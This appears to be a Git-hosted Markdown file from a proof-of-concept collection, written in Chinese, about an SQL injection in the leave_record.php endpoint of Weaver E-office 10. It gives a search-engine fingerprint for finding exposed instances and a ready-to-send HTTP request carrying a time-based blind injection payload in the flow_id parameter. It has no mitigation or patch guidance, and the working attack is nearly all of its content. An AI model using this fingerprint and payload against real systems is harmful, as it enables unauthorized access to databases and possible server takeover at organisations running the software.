admin/POC00
1
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity
POC00/泛微E-office-10接口leave_record.php存在SQL注入漏洞.md
wy876 7d72f96815 7.17更新漏洞
2024-07-17 13:07:11 +08:00

24 lines
1.2 KiB
Markdown
Raw Permalink Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

# 泛微E-office-10接口leave_record.php存在SQL注入漏洞
泛微eoffice10协同办公平台是一款专业的office办公的工具软件。软件支持在线多人编辑文件并且会在第一时间收发协作需求。十分方便快捷界面简约布局直观清晰操作简单极易上手是一款不可多得的利器。泛微E-office 10 leave_record存在SQL注入漏洞攻击者可通过该漏洞获取数据库敏感信息甚至getshell。
## hunter
```yaml
web.body="eoffice10"&&web.body="eoffice_loading_tip"
```
## poc
```yaml
GET /eoffice10/server/ext/system_support/leave_record.php?flow_id=1%27+AND+%28SELECT+4196+FROM+%28SELECT%28SLEEP%285%29%29%29LWzs%29+AND+%27zfNf%27%3D%27zfNf&run_id=1&table_field=1&table_field_name=user()&max_rows=10 HTTP/1.1
Host:
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:122.0) Gecko/20100101 Firefox/122.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Connection: close
Upgrade-Insecure-Requests: 1
```
![img](https://sydgz2-1310358933.cos.ap-guangzhou.myqcloud.com/pic/202407171255148.png)
Reference in New Issue View Git Blame Copy Permalink